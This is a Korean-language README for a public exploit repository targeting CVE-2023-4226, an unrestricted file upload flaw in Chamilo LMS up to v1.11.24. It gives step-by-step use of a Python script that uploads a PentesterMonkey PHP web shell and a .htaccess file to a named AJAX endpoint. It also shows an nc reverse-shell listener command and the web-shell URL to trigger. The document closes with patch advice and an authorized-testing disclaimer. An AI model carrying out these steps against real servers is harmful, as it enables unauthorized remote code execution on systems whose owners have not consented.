
**Chamilo LMS**(<= v1.11.24)에서의 무제한 파일 업로드 취약점.
CVE-2023-4226 악용을 자동화하는 Python 스크립트로, Chamilo LMS (<= v1.11.24)의 무제한 파일 업로드 취약점입니다. PentesterMonkey 기반 PHP 웹 셸을 업로드하고 .htaccess를 구성하여 리버스 셸을 획득합니다. 자세한 내용: STAR Labs 권고.
/main/inc/ajax/work.ajax.php에 PHP 파일을 업로드하여 RCE를 달성할 수 있습니다.ch_sid).rce.php에 IP 및 포트 반영./main/work/work.php?cidReq=HW에 GET 요청./main/inc/ajax/work.ajax.php에 POST 요청으로 rce.php 및 .htaccess 업로드./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
파일: rce.php (PentesterMonkey, 저장소에 포함), .htaccess (스크립트로 생성).
네트워크: 리스너용 IP 및 포트 (예: nc -lvnp 4444).
저장소를 클론합니다:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
스크립트에 실행 권한을 부여합니다:
chmod +x CVE-2023-4226.py
의존성을 설치합니다:
pip install requests colorama
터미널에서 리스너를 시작합니다:
nc -lvnp 4444
스크립트를 실행합니다:
./CVE-2023-4226.py
입력합니다:
ch_sid.리버스 셸을 시작하려면 웹 셸에 접속합니다:
http://<chamilo>/app/cache/rce.php
예: http://chamilo.local/app/cache/rce.php
Chamilo >= v1.11.26으로 업데이트합니다.
파일 이름을 무해화합니다.
disable_dangerous_file()에서 HTML을 차단합니다.
.htaccess에 추가합니다:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
승인된 테스트에만 사용하십시오. 무단 사용은 불법입니다.